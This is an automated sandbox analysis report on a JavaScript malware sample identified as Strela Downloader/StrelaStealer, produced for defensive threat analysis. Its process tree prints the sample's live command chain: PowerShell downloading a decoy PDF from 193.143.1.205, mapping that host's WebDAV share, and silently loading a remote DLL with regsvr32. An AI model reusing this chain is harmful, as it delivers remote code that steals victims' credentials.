Windows
Analysis Report
795324045931728678.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 3552 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\79532 4045931728 678.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6680 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\160 9222332894 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4268 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 4920 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 4472 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7232 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=1372,i ,168625580 8785570052 2,11193005 4149563562 6,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 6344 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588537 |
Start date and time: | 2025-01-11 02:10:27 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 795324045931728678.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 172.64.41.3, 162.159.61.3, 34.237.241.83, 50.16.47.176, 54.224.241.105, 18.213.11.84, 2.23.242.162, 23.209.209.135, 217.20.57.26, 2.16.168.105, 2.16.168.107, 23.55.243.72, 23.55.243.70, 23.55.243.85, 23.55.243.68, 23.55.243.74, 23.55.243.77, 192.168.2.8, 52.22.41.97, 4.175.87.197, 104.126.112.182, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:11:28 | API Interceptor | |
20:11:32 | API Interceptor | |
20:11:32 | API Interceptor | |
20:11:40 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8022044540254502 |
Encrypted: | false |
SSDEEP: | 1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAx:RJE+Lfki1GjHwU/+vVhWqpA |
MD5: | 1F0A1AAA7188CD3E004F07D650ACDD42 |
SHA1: | FC3DCCCB1A808871A6A3A7CE428635AEDA2B9FAB |
SHA-256: | 43FEC406CA3C0469309992FF36402AE4EB0D86D5C1D9DD0F55A1C632AD551FF8 |
SHA-512: | 4457EA30765602E6B82E4ACABA6E57EBB344CC59A1CDC6BD44DB5AA7308F682B246B01802C0F0E87ADA07643C826457EFC9A05197F31EFEDE77FA92A3E6676CC |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1048576 |
Entropy (8bit): | 0.9433209900447082 |
Encrypted: | false |
SSDEEP: | 1536:7SB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:7azaHvxXy2V2UR |
MD5: | 590EBB6917AF9C1DF7E46ED9DD016F4D |
SHA1: | A3CDCB0306E194F465E2701FB8A6981174C54751 |
SHA-256: | BF0AEADB30C03A29681812A529A4256426FA18D74F3F67DAEAB1554D1D1FBE10 |
SHA-512: | 59570CF928376CD942588D089B22C95C40DCBFBCE8E15966FD28C30864A99F29EBD04C4BA6DB8C502E4093A9BD745D7072EC2FC4B5A6E3F40FBE162E6C51D72A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08139077573273883 |
Encrypted: | false |
SSDEEP: | 3:jUYezrrY8Xlsl/nqlFcl1ZUllllrHMkrtAllGBnX/l/Tj/k7/t:gzzrr5lsl/qlFclQ/lpA254 |
MD5: | A7C45D870D9E5F5E4C73CDCD16DCE45C |
